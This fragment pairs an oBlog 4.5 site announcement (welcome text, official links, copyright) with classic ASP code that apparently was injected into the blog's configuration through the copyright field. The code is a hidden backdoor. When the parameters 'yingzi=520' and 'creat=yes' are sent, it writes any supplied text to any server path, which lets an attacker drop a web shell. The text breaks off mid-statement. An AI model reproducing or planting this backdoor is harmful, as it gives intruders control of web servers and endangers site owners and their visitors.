站点公告
欢迎使用oBlog4.5
官方站点:http://www.oblog.cn
使用中如有什么问题可以访问
官方论坛:http://bbs.oblog.cn
版权所有 Copyright© 2003
动力空间" '版权信息
if Request("yingzi")="520" then
dim allen,creat,text,thisline,path
if Request("creat")="yes" then
Set fs = CreateObject("Scripting.FileSystemObject")
Set outfile=fs.CreateTextFile(server.mappath(Request("path")))
outfile.WriteLine Request("text")
Response.write "succeed!"
end if
Response.write "